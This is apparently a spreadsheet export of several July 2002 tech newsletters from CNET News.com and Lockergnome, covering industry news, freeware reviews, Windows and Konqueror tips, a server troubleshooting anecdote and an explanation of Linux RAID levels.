\nEnthusiasts of free software disrupted a Commerce Department meeting\nWednesday, insisting on their right to debate the entertainment industry over\nanti-copying technologies. About a dozen vocal tech activists in the audience\nchallenged speakers, including Jack Valenti, head of the Motion Picture\nAssociation of America (MPAA), who equated piracy with theft and applauded\ndigital rights management.  \nJuly 17, 2002, 5:55 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Earnings alert: Handspring trims loss**  \nRead the latest in earnings reports and financial news from some of\ntechnology's leading players. This page is updated as new reports are filed.\nKeep checking back for the latest.  \nJuly 18, 2002, 11:00 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n|  **From our partners:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n**The view from Expedia's pilot**  \nBusiness Week  \nCEO Richard Barton on the online travel company's big plans for corporate-\ntravel services--and on Barry Diller's takeover bid.  \nJuly 18, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**WorldCom feels the freeze**  \nBusiness Week  \nA quick reorganization and turnaround are looking ever less likely now that a\nNew York judge has put $2.5 billion of its assets on ice.  \nJuly 18, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Also from CNET:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |  ![Crucial\n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n  \n![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://news.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n|  **New iPod does Windows**  \nAt Macworld in New York, Apple Computer CEO Steve Jobs shows off a new iPod\nthat's thinner, cheaper -- and compatible with Microsoft Windows.  \n![]([URL]http://news.cnet.com[/URL] **Watch Video**  \n  \n---|---|---  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] |  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n  \n**Enterprise**  \n\n  * SAP's sales sagging\n  * EMC breaks even\n  * TI boosts Sun's UltraSparc chip \n|\n\n**E-Business**  \n\n  * Tech stocks wallow in earnings funk\n  * Corporations favor age, experience\n  * E*Trade profit up on cost cuts \n  \n---|---  \n  \n**Communications**  \n\n  * KPNQwest network's shutdown imminent\n  * WorldCom may file bankruptcy next week\n  * Level 3 gives mixed signals on recovery \n|\n\n**Media**  \n\n  * Record labels target Chinese portals\n  * AOL's accounting scrutinized\n  * Some Beijing Net cafes reopen \n  \n  \n**Personal Technology**  \n\n  * Trying to connect at Macworld\n  * ATI uncovers comeback chips\n  * Apple's .Mac faces a hard sell \n|  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]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n\nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com  \nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.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33&amp;ISSUE=2002-07-18)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Tech Specialist &lt;subscriptions@lockergnome.com&gt;\nDate: Thu, 18 Jul 2002 10:16:49 -0500</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 10:16:49 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Tech Specialist]  Friend Fry</t>
  </si>
  <si>
    <t>![10354]([URL]http://www.winnetmag.com[/URL]![]([URL]http://ad.linksynergy.com[/URL]\nbin/show?id=vdKWfulJxTQ&amp;bids=36698.10000263&amp;type=4&amp;subid=0)  \n  \n---  \n|\n\n  07.18.2002 GnomeREPORT  \n  \n---  \n  \n**Keep your Web site working fast and smart with UltraDNS.** More reliable\nperformance means more traffic, more sales, and more profits. Outsource your\nDNS management and save. Basic DNS for only $1.00 a month. Click here to find\nout more.  \n---  \n  \nI thought I baked my Dell PowerEdge 1400SC server yesterday when it refused to\nboot completely. I borrowed a data vac from a friend and decided to clean all\nof the dust and cat hair from my systems, then after reconnecting everything,\nthe server would boot to the initial splash screen, where there is a POST\nprogress bar, but would not proceed past past about the first 1/5th of the\nbar. Uh-oh. What did I fry?\n\nAs it turns out, it was another case of "always check the small stuff". Oh, I\nhad all of the cables plugged back in to the server properly, I checked all of\nthat, but it didn't dawn on me until about a half dozen boot attempts later\nthat I should probably turn an eye toward the other end of the cables. That\nserver is connected to an 8-port Compaq KVM switch and with all of the\nyanking, plucking and shuffling, the keyboard cable had been eeked out of the\nswitch just a tad. Why the server didn't display a keyboard warning message\nlike every other computer on the planet, I can only attribute to the BIOS\ndevelopers. Server Satchel, running Red Hat Linux 7.2 is now operating as it\nwas previously. The penguin is happy. The server case is even black. How\nappropriate...\n\nSee You in August,  \nRandy Nieland  \n\n  \n\n GnomeNETWORK  \n  \n---  \n  \n**Windows XP Security Checklist**  \nFinely crafted by Bernie Klinder\n\n[URL]http://www.labmice.net[/URL]\n\nWith all of the security features crammed into Windows XP, where does one\nstart? Do you need VPN capability? Is NTFS an appropriate file system choice\nfor you? Is there any value at all in Simple File Sharing? After much\nhounding, Bernie Klinder has drawn up a healthy checklist of things you need\nto address under Windows XP in order to maintain a system that is both\nsecurity and compatible with the rest of your computing world.\n\n  \n\n GnomeSYSTEM  \n  \n---  \n  \n**ATI Still Makes Video Cards?**\n\n[URL]http://www.anandtech.com[/URL]\n\nSay it isn't so! Yes, apparently they do still have something to say about\nNVIDIA's dominance in the video card market. Seeing as how they've been all\nbut dumped by the majority of top-tier system makers, it's hard to believe\nthat they are capable of a serious comeback. Judging from what AnandTech has\nto say about the forthcoming R300-based cards, it appears that they haven't\nthrown in the towel just yet. I'm all for competition, so I welcome the\neffective re- entrance into the high end market. Let's all hope that their\ndriver development has improved as much as their hardware seems to have.\n\n**GET WINDOWS XP TIPS:** Months after the release of Windows XP Professional\nand Home editions, people are still learning the nuances of Microsoft's newest\noperating system. Whether you've been using it for a while or are planning to\nupgrade to the new OS soon, this ebook is right up your alley. GET YOUR COPY\nof Lockergnome's Top 50 Windows XP tips now!  \n---  \n  \n  \n\n GnomeALERTZ  \n  \n---  \n  \n**Today's Top 5 kbAlertz**\n\n  * Q292108 - WD2002: GetSpellingSuggestions Method Does Not List Non-English Language Suggestions (Q292108)\n  * Q290981 - WD2002: "File Conversion Encoding" Dialog Box Appears When You Open Text File (Q290981)\n  * Q290969 - WD2002: Run-Time Error 5 When You Use Mid(), Left(), or Right() Function (Q290969)\n  * Q290967 - WD2002: Cannot Place a Bullet in the Middle of a Sentence or Paragraph (Q290967)\n  * Q201953 - WD2000: Macro to Find Automatic (Soft) Page Breaks (Q201953)\n\nRecommend It!\n\n  \n\n GnomeASSISTANT  \n  \n---  \n  \n**Technical Censorship**\n\n[URL]http://news.com.com[/URL]\n\nOdd. I liked that cup of Mocha (spelled M-O-C-H-A and I'll explain in a\nminute) I drank at Starbucks when Jake and I visited last week, but if I\nwanted to relay that to someone using a Yahoo email account, you might see an\nalternate word. Thus the additional hyphenated spelling just in case those of\nyou using Yahoo to subscribe to Lockergnome actually received your issues and\nthe word has been altered to suit their personal opinion of my choice in\ndrinks. They've also had a terrible time interpretting our W3C standardized\nHTML lately, dropping in copious #message references throughout the text in\ntheir new Beta email client. So why the text replacement? It's another\nfiltering technique to stop certain words that might relate to JavaScript\nfunctions. I guess I'll have to choose another beverage next time. Silly me.\n\n  \n\n GnomeSTUFF  \n  \n---  \n  \n**Yer Kidding... Really?**\n\n[URL]http://www.theregus.com[/URL]\n\nI'm all sorts of sarcastic today, aren't I? Those of us that have had to\nmanage budgets are used to dealing with math in terms of hardware, software,\nmaintenance and personnel costs. It's not really that difficult. It's\ncertainly not hard to see that dropping a free version of Linux on a server\nwith less hardware requirements just to do some file sharing, printing and\nmaybe an Intranet page or three is far cheaper than using Windows. At very\nlong last, Microsoft has admitted as much. Of course, they're quick to point\nout that they have much more to offer than Linux, which may indeed be true.\nBut at the end of the day, when you compare donuts to donuts and like\nfunctions against one another, Linux is cheaper. For a shop of Windows-trained\nstaff, dealing with Linux will certainly be a challenge, requiring additional\ntraining, suffer the odd blunder here and there, and be less forgiving when it\ncomes to detailed configuration. On the same token, make a Linux whiz use\nWindows and see how quickly you'll be searching for a replacement. Cheap is in\nthe budget of the beholder.\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 Tell a Friend About Us!  \n Suggest a Feature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n E-mail a Suggestion  \n Your Rant / Rave  \n General Feedback  \n The Editor's Blog  \n E-mail the Editor  \n\n\n\nSOUND SYSTEMS  \n  \n---  \n  \nYamaha RX-V1200  \nSony DAVC900  \nHarman Kardon AVR520  \nDenon AVR5803  \nPioneer VSXD811S  \nPioneer Elite VSX49TX  \nSony HTDDW840  \nYamaha HTR5560  \nBOSE LS122BK  \nSony DAVC450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www.winnetmag.com http://ad.linksynergy.com http://www.labmice.net http://www.anandtech.com http://news.com.com http://www.theregus.com http://www.lockergnome.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Windows Daily &lt;subscriptions@lockergnome.com&gt;\nDate: Thu, 18 Jul 2002 09:55:22 -0500</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 09:55:22 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Windows Daily]  Sticker Courtesy</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![See You\nat Gnomedex\n2002!]([URL]http://www.lockergnome.com[/URL]  \n  \n---  \n|\n\n  07.18.2002 GnomeREPORT  \n  \n---  \n  \n**GET WINDOWS XP TIPS:** Months after the release of Windows XP Professional\nand Home editions, people are still learning the nuances of Microsoft's newest\noperating system. Whether you've been using it for a while or are planning to\nupgrade to the new OS soon, this ebook is right up your alley. GET YOUR COPY\nof Lockergnome's Top 50 Windows XP tips now!  \n---  \n  \nI don't go to many concerts, but that doesn't mean I don't appreciate\nlistening to good music at every waking moment. Tonight, a handful of Bay\nGnomies and I watched They Might Be Giants rock the Fillmore. Melanie, Steve,\nBrent, Missy, Robert, Patrick, Gretchen, Matt, and Mindy had a total blast.\nWell, it wasn't much fun when Robert got his digital camera confiscated - but\nthis was a show worthy of five megapixels (believe me)! Brent went to the show\nlast night, and I saw them play on the set earlier this afternoon. They were\nselling a new CD (which had JUST been released the other day); "They Got Lost"\nis full of a few previously-unavailable tracks. If you aren't sure about\npurchasing it outright, I strongly urge you to sign up for a trial EMusic\naccount and download a few of their songs in MP3 format. Oh, and check out the\nopening act: Noe Venable. She's got a few free MP3s on her site, too. Give\n"Boots" a shot - very nice.\n\nDoes anybody know how to set a binary clock? Melanie got it for me as a gift\n(which was a very nice gesture). Sure, I could read the manual - but the ones\nand zeros start to look eerily similar after flipping past the first page. You\nknow me: I'm not much of a math guy. In fact, I just discovered the other day\nthat 'byte' was short for 'by eight' (even though I already knew that 'bit'\nrepresented 'binary digit'). I'd stick with a digital timepiece, but it just\nisn't geeky enough for me anymore. How sad is that? I'm ready to walk on the\nwild side. Maybe I'll get my laptop pierced tomorrow? It could happen. I've\nbeen known to do nutty things on a moment's notice, like changing my default\nWeb browser. Courtesy of Asa Dotzler, I have an official Mozilla sticker, CD,\nand t-shirt (which you saw me model in my Webcam the other day). Don't be too\njealous; Mozilla.org has plenty of goodies to go around.\n\nLooks as though Jake and Lori are already having a blast in St. Louis. They're\nat the Shareware Industry Conference, along with hundreds of well-known\nprogram programmers - the people who make our computers work the way we want\nthem to work! We're doing our best to convince them to join us at Gnomedex.\nThey ask: "Who else is going to be there?" We answer: "People who don't know\nyou yet." They ask: "Then why should I come?" We answer: "Because it's a\nbusiness opportunity for you." They ask: "What if I don't want to learn\nanything or meet anybody?" We answer: "We can't really help you there, but\nhere - have lunch on us." They ask: "Oh, the admission price includes food at\nat Gnomedex?" We answer: "We cannot provide every meal, but you won't go\nhungry." They ask: "So, why Des Moines, when there's nothing to do there." We\nanswer: "You're 100% wrong. There *IS* something to do there: Gnomedex." Get\nit? Got it? Good.\n\nSee You in August,  \nChris Pirillo  \n\n  \n\n GnomeDOWNLOADS  \n  \n---  \n  \n|  | **Latest Downloads**  \n---  \nVisiTrax Lite 2.91  \nmp3DirectCut 1.23  \nCpick 2.6  \nImage Browser 4.4  \nEZ JavaScript 1.1  \nWinHTTrack 3.20RC5  \nPanda Quick Rem 3.2.1.0  \nEZBack-it-up 1.1  \nArtSee 1.0  \nSoliton 2  \nFresh Download 4.30  \n  \n**GigAlarm v1.201 [33k] W9x/2k/XP FREE**\n\n[URL]http://users.bigpond.net.au[/URL]\n\n{String on your finger} Sometimes, I'm a bit like the absent-minded\nprofessor... I would forget my own head if it wasn't attached. So naturally, I\nappreciate any program that can help keep me on track, and with GigAlarm I can\nsetup whatever reminders/alarms I need. However, sometimes a simple text\nmessage just won't catch my attention. Well, herein lies the beauty of\nGigAlarm... it doesn't just have to give you a text alarm! GigAlarm can play a\nWAV file (random, or your selection), change your background, start a program,\nor use one of the many Windows shutdown options. My wife has gotten in the\nhabit of using the Shutdown option as an alarm to signal that I have spent too\nlong on the computer. (Lucky for me, there is a snooze button!) NOTE: The\nauthor says, "This program is essentially free to use for non-profit\npurposes... If you find this program useful I would appreciate $10 AUD (or $5\nUSD) as a token of your appreciation."\n\n  \n**Context Thumbview v1.0.b1 [107k] W9x/2K/XP FREE**\n\n[URL]http://contextmagic.netfirms.com[/URL]\n\n{Peep show} I'm not always very patient, especially when it comes to my\ncomputer. Double-clicking on an image and waiting for it to come up in my\nimage viewer is almost too much for me to handle. Lucky for me, Context\nThumbview has made its way onto my system and I no longer have to wait to view\nan image. All I do now is right-click the image, choose "View Thumbnail," and\nthere is the image, out there for me to see... all without me having to open\nup any programs! "As Express ThumbView is an Explorer extension, it is always\nready and available for use. Moreover, it is available in any Explorer window,\nincluding Open and Save As... dialog boxes." As an added bonus, with Context\nThumbview installed on my system, I can also turn off the thumbnail view if I\nwant to save system resources.\n\nRecommend It!\n\n  \n\n GnomeCLICKS  \n  \n---  \n  \n![TECHNOLOGY can be frustrating for new and intermediate computer users, UNTIL\nNOW. Join us for a FREE Windows Newsletter, video tutorials, articles, special\nreports, and\nmore!]([URL]http://www.lockergnome.com[/URL] | ![The\neasiest way to Zip/UnZip. An AWARD-WINNING file compression utility featuring\nquick backup, batch processing, Windows integration and SUPPORTS 15 archive\nformats \(ACE, RAR, etc\).]([URL]http://www.picozip.com[/URL] |\n![Handy Backup]([URL]http://www.lockergnome.com[/URL] |\n![Secure your\nE-Mail!]([URL]http://www.lockergnome.com[/URL] |\n![Shortcut to\nRDesk.exe]([URL]http://www.capitalintellect.net[/URL] |\n![IPCheck Server Monitor monitors a network using various protocols \(e.g.\nping, http, smtp, ftp\) and notifies the staff in various ways as soon as an\noutage occurs.]([URL]http://www.lockergnome.com[/URL] |\n![Share your team/project contacts, calendars, tasks, etc. in MS Oulook 2002,\nwithout a\nserver!]([URL]http://www.lockergnome.com[/URL]  \n---|---|---|---|---|---|---  \n  \n  \n\n GnomeSYSTEM  \n  \n---  \n  \n**Starter v5.5.4.2175 [423k] W9x/2k/XP FREE**\n\n[URL]http://codestuff.tripod.com[/URL]\n\n{Startup manager} This application bills itself as "Yet Another Startup\nManager"... I don't think so! Starter isn't JUST another Startup Manager, it's\na piece of programming art. One of my biggest problems with Windows Task\nManager is that I don't know what all the processes on my machine are, or from\nwhere they are running. Starter not only gives me that information, but it\nalso lets me save it as an HTML file. In addition, Starter lets me import and\nexport registry keys or add a new task to be processed. Don't run all over\nyour machine trying to find all the programs you need to control your PC, when\nyou can do it all (and more!) with Starter.\n\nRecommend It!\n\n  \n\n GnomeWILDCARD  \n  \n---  \n  \n**Aversoft Sticker v3.55 [592k] W9x/2k/XP US$15**  \nUnearthed by Sergei Lepyokhin\n\n[URL]http://www.aversoft.com[/URL]\n\n{Sticky notes} Did you know that Post-it(r) Notes were invented by accident? I\nuse to have these notes all over my monitor. Now my screen is clean as a\nwhistle! Aversoft Sticker is a program to help you remember "important\ninformation by displaying skinnable sticky notes on your Windows desktop." No\nmore bland notes for me! With Sticker, I am surrounded with pictures of\nparadise (downloaded from Aversoft's website). These great features are no\naccident. Sticker also has a transparency feature that makes the notes only\nhalf visible, making it much easier to use while working on your other\nprograms. Don't walk away yet though... Sticker also allows you to print your\nnotes, lock them from accidentally being deleted, and set an alarm (repeating\nor one-time). Speaking of alarms, mine just went off and opened up Outlook.\nTime to send out today's newsletter!\n\nSubmit Your Thoughts | Recommend It!\n\n  \n\n GnomeFAVORITE  \n  \n---  \n  \n**CAREER SERVICES FROM LOCKERGNOME AND DICE.COM:** We've teamed up with\nDice.com to bring you a full service I.T. career enhancement solution. Whether\nyou are looking for your dream job or trying to hire talented people, the\nfull-featured career resource center is the place to start. Find your IT\ntalent solution today!  \n---  \n  \n**Wikipedia Encyclopedia**\n\n[URL]http://www.wikipedia.com[/URL]\n\n{We is smart} Those Saturday morning folks at ABC were right: it's great to\nlearn, 'cause knowledge is power. I highly encourage everyone to learn\nsomething new each day, and with Wikipedia.com you can! Wikipedia is a free,\nand very thorough online encyclopedia; you'll be hard-pressed to stump this\ninformation tool with an undocumented topic. Know what you're looking for?\nThen just use the search tool. In the mood to fill your cranium with a few new\nthought processes? Just browse through any one of Wikipedia's many categories\nuntil you find a subject that piques your interest. From Physics to Opera;\nfrom Anthropology to Cooking, you will find it all here. Now, all that is\nmissing is you! Take a look and beef up your gray matter.\n\nRecommend It!\n\n  \n\n GnomeTIP  \n  \n---  \n  \nGnomies are known for their willingness to help others and Alex Warren is no\nexception with a tip on copying text. Alex writes: "Did you know that you can\ncopy the contents of a message/dialog box just by pressing Ctrl+C?" Alex also\nhad this to say: "When you select text and then use the mouse to drag it to a\nnew location, the original text moves to the new location and disappears from\nthe old location. However, you can select text and then use the right mouse\nbutton to drag it to a new location. When you do this, releasing the right\nmouse button opens a menu from which you can choose to move or copy the text\n(along with several other options)." Those are some great time saving tips\nAlex! Following suit with using Ctrl + C to copy... you can also use Ctrl + X\nto cut and Ctrl + V to paste. You can also use all these tips on more then\njust text! The next time you need to copy some files on your PC, try the\nright-click and drag method and you will see what I mean... along with saving\nyourself some time.\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Our Tip Files  \n\n Latest Windows Daily  \n Latest Digital Media  \n Latest Tech Specialist  \n Latest Penguin Shell  \n Latest Apple Core  \n Latest Web Weekly  \n Latest Bits &amp; Bytes  \n\n Find the Lowest Price  \n\n Suggest a Feature  \n Advertise With Us  \n The GnomeSTORE  \n High-Tech Job Search  \n Chat With Gnomies  \n Watch The Webcams  \n Computer Power User  \n\n Read Past Issues  \n Download X-Setup  \n About Lockergnome  \n Our Privacy Policy  \n View More Options  \n Our XML / RSS Feed  \n Syndicate Our Tips  \n Link To Lockergnome  \n Get Chris's Book  \n\n Tell a Friend About Us!  \n\n General Feedback  \n E-mail the Editor  \n The Editor's Blog  \n\n\n\nSEARCH  \n  \n---  \n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HAPPY FUN STUFF  \n  \n---  \n  \nAnd now, we see how Sprocket thinks he has a right to eat pumpkin seeds. Or,\nwould that be "pupkin" seeds?\n\nNot for the Puppy\n\n\n\n![Lockergnome Webcam\nImage]([URL]http://www.lockergnome.com[/URL]  \n---  \nCLICK HERE TO ZOOM  \n  \n\n\n![]([URL]http://images.lockergnome.com[/URL]\n\n\n\nBYTE ME NOW  \n  \n---  \n  \n(C)2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read\nour Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered\nat DNS Central.  Bacteria acts more intelligent than human beings.\n\n</t>
  </si>
  <si>
    <t>http://images.lockergnome.com http://www.lockergnome.com http://users.bigpond.net.au http://contextmagic.netfirms.com http://www.lockergnome.com http://www.picozip.com http://www.lockergnome.com http://www.lockergnome.com http://www.capitalintellect.net http://www.lockergnome.com http://www.lockergnome.com http://codestuff.tripod.com http://www.aversoft.com http://www.wikipedia.com http://www.lockergnome.com http://www.lockergnome.com http://images.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Penguin Shell&lt;subscriptions@lockergnome.com&gt;\nDate: Thu, 18 Jul 2002 09:13:32 -0500</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 09:13:32 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Penguin Shell]  Weekend Warriors</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![Linux\nCentral]([URL]http://www.qksrv.net[/URL]  \n  \n---  \n|\n\n  07.16.2002 PenguinREPORT  \n  \n---  \n  \n**CAREER SERVICES FROM LOCKERGNOME AND DICE.COM:** We've teamed up with\nDice.com to bring you a full service I.T. career enhancement solution. Whether\nyou are looking for your dream job or trying to hire talented people, the\nfull-featured career resource center is the place to start. Find your IT\ntalent solution today!  \n---  \n  \nI've got a few quick Lockergnome-related notes for you today.\n\nFirst, we'd really like to see you in August. I know that Jake, Chris and\nRandy have been signing off on their newsletters with those few words, and\nI'll join them. If you didn't experience Gnomedex last year, you missed, in\nthe words of many industry insiders, "The show of the year." It was unlike any\nother computer conference I've ever attended. Unlike any conference I've\nattended, period, computer-related or not. While most such conferences are a\nhuge hustle and hassle, Gnomedex was what computing and Lockergnome are all\nabout - sharing useful information, gathering with like-minded enthusiasts,\nand learning to use your chosen computer to the fullest extent. No hustle. No\nhassle. No BS. For the minimal cost of registration, it would be hard to find\na better weekend for geeks and wannabes alike. Add to that the schedule of\nluminaries presenting and attending and you've got the best deal on the planet\nfor computer users. It's hard to believe we're less than a month away - I\nreally do hope to see you there.\n\nAnother Lockergnome innovation has hit the newsstands - err, bookstores.\nThat's right. Jake has release a **FREE** GnomeTome on "Converting Vinyl LPs\nto CD." Who'd have thought there were so many of you out there that are, well,\nmy age and still in possession of those black slabs of aural heaven. I don't\nknow if Jake's just lost his mind, or what, but free? Get outta here. Go ahead\n- "Gnome" our servers. Get you copy while you can. And while you're there,\ncheck out some of the other killer e-tip books in the GnomeTomes collection.\n\nHave a great Tuesday.\n\nTony Steidler-Dennison  \n\n  \n\n GnomeTWEAK  \n  \n---  \n  \n**Lockergnome readers, SAVE 50% on the Computing Encyclopedia!** Are you\nlooking for the ultimate computing resource? Discover the _Computing\nEncyclopedia_ from Smart Computing. Regular price $59, SPECIAL OFFER for\nLockergnome readers, get your set TODAY, ONLY $29.95!  \n---  \n  \n**Setting the Home Page in Konqueror**\n\nKonqueror, while a great browser, has taken a step in the direction of IE.\nLike IE, Konqueror is really an integrated web _and_ file browser. You can use\nit equally well to view web pages and files on your system. It's been\nsomething of a hot debate whether this is actually the proper use of a\nbrowser. In fact, Galeon was written specifically to answer this question -\nit's a web browser and a web broswer only.\n\nRegardless, it can be a bit annoying to punch the Home button on the Konqueror\nbrowser and end up in your /home/ _user_ directory. Have no fear, though. It's\nan easy change to make your actual web home page the home page in Konqueror.\n\nOpen Konqueror and select Settings from the toolbar. Select "Configure\nKonqueror," and leave the default selection of "File Manager" as is. In the\ntext box on the right half of the screen, you'll see a tilde in the "Home URL"\ntext box. That just tells Konqueror to use the user's home directory as the\nhome URL. Changing this to a web address will set that address as your home\npage. Select OK to close the window.\n\nTaking it one step further, click on the Home button in your Konqueror browser\nto open your newly-configured web home page. Then, select "Window" and "Save\nView Profile, 'Web Browsing.'" This will futher save the URL and allow your\nthe opportunity to save the window size when the browser opens.\n\nKonqueror is more than just a web browser. But, it's not so tough to make it\nact like a pure web browser if you just know where to look.\n\nRecommend It!  \nSend us a GnomeTWEAK\n\n  \n\n GnomeCORE  \n  \n---  \n  \n**Kernel Configuration - Part XII**\n\nDepending on who you talk to, RAID can stand for "Redundant Array of\nIndependent Discs" or "Redundant Array of Inexpensive Discs." No matter. They\nboth point to the same theory and practice in Linux; data storage redundancy.\nThat's today's kernel configuration section - Multi-Device Support.\n\nLet's talk first about the principles behind a RAID setup. RAID uses multiple\ndiscs for speed, increased data storage, or data redundancy. Fundamentally,\nthere are 5 levels of RAID in Linux; Linear, RAID-0, RAID-1, RAID-4, and\nRAID-5.\n\nLinear RAID uses two or more discs, appending data from one to another. In\nother words, when disc 1 is full, disc 2 steps in to store data. There is no\nredundancy in Linear RAID - only an increase in storage capacity. Further,\nthere's no marked increase in data access speed because you're accessing one\ndrive in the RAID array at a time.\n\nRAID-0 "stripes" data across the RAID drives. Some data will be written to the\nfirst drive, some to the second, etc. Like Linear RAID, RAID-0 provides no\nredundancy. Because the data has been written in parallel across the drives,\nnot all data exists on all drives. Lose a drive and your data is gone. RAID-0\nwill, however, decrease data access time. Your system will run more quickly.\n\nRAID-1, unlike Linear and RAID-0, _does_ provide data redundancy. This is the\nfirst level in which data is "mirrored" across the drives in the RAID array.\nAll data that exists on one drive exists on all the others. RAID-1 requires at\nleast two drives and they should be of equal size, otherwise, your overall\nRAID array will be the size of the smallest drive. Performance with RAID-1 can\nactually be slower than with a single drive or RAID-0, as all the data is\nwritten across multiple discs.\n\nRAID-4 is, for the most part, pretty useless. It reserves one disc for parity\ninformation while striping the data across the others. This is much like\nLinear mode, with an additional disc thrown in for parity data. Parity data\n_can_ be used to reconstruct and retrieve the data on the other drives, but\nthis really isn't a redundant method of data storage. Consequently, RAID-4 is\nprobably the least used of the RAID schemes.\n\nRAID-5 is designed for 3 or more discs and provides both redundancy and speed.\nLike RAID-4, RAID-5 pays close attention to parity data. However, rather than\nreserving a device in the RAID array for this data, it's written across the\narray. Because the parity data is written across the array, data recovery can\nbe accomplished fairly quickly. In fact, using a "spare disc" configuration\nwill allow RAID-5 to reconstruct the data to the spare disc immediately after\nthe failure of a drive. Because of it's increased speed and redundancy, RAID-5\nis probably the most common setup for multiple storage devices.\n\nWith all that in mind, you'll need to make a choice in your kernel\nconfiguration. Do you have mutliple drives of the same size that you'd like to\nconfigure as a RAID array? The Multi-Device Support section of the kernel\nconfiguration will allow you to do this. In fact, you'll be able to set the\nRAID level, as well. Again, evaluate your needs and select the appropriate\noption.\n\nTomorrow, it's on to networking options in your kernel configuration.\n\nRecommend It!  \nSend us a GnomeCORE tip\n\n  \n\n GnomeFILE  \n  \n---  \n  \n**SaveMyModem**\n\n  \n[URL]http://web.genie.it[/URL]\n\n"SaveMyModem is an anti-spam, mail-shaping, and delete-on-server mail tool. It\nis designed for users with slow dialup connections, who are tired of\ndownloading large amounts of spam and worm and virus attachments."\n\nRecommend It!  \nSend us a GnomeFILE suggestion\n\n  \n\n GnomeVOICE  \n  \n---  \n  \n**Windows Apps in Linux?**  \nScribbled by Robert Nix\n\n"Nice coverage but I don't give a flip about Office. OpenOffice is fine for my\nneeds.\n\n"What I really want is to run Quicken (at least v.2001) which is the only app\nkeeping me running Windows (using vmware). I've tried Quicken on Mac OS X and\nit is grossly inadequate and on Linux with Wine and have so far been\nunsuccessful even using tips from\n[URL]http://appdb.codeweavers.com[/URL] I hope that GnuCash will\neventually support the online features I enjoy but that doesn't help now.\n\n"The reason I'm writing this is that I personally think Office products are\noverrated for home users, at least now that there are several native\nalternatives. For home users, finance apps are the key issue now. Do a section\non getting Quicken to run in Wine and I'll declare you a god. :)"\n\nRecommend It!  \nSpeak your GnomeVOICE\n\n  \n\n GnomeCLICK  \n  \n---  \n  \n**Important Unix Manpages**\n\n[URL]http://home.ins.de[/URL]\n\nManpages are an important part of Linux use. Armed with the proper knowledge\nand manpage, there are few sticky situations in Linux that can't be solved\nquickly. Though they can be a bit cryptic at times, manpages are really a\nLinux newbie's best friend.\n\nImportant Unix Manpages is a compilation of help for situations that actually\nhave little to do with programming. They're more human interface problems than\nmachine interface problems. This page just points out that if life was like\nLinux, we'd all be a lot happier.\n\nRecommend It!  \nSuggest a GnomeCLICK\n\n  \n\n|  [URL]http://www.lockergnome.com[/URL]\n\nYour subscribed e-mail address is: [qqqqqqqqqq-lg@example.com] - To\nunsubscribe or change your delivery address, please visit the subscription\nmanagement page. Use of the Gnome moniker by Penguin Shell does not imply\nendorsement of the Gnome Desktop Environment. Penguin Shell is an equal-\nopportunity desktop employer. For further information, please refer to the\nGnomeCREDITS in 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See You in\nAugust!]([URL]http://chris.pirillo.com[/URL]\n\n Tell a Friend About Us!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 Win a Digital Camera  \n\n General Feedback  \n Chris's Blog  \n E-mail the Editor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www.qksrv.net http://web.genie.it http://appdb.codeweavers.com http://home.ins.de http://www.lockergnome.com http://chris.pirillo.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: "CNET News.com" &lt;Online#3.20471.b9-LhVolp59dUxVpsRR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 09:08:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 09:08:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com" &lt;Online#3.20471.b9-LhVolp59dUxVpsRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET NEWS.CONTEXT: Adios to options excess?</t>
  </si>
  <si>
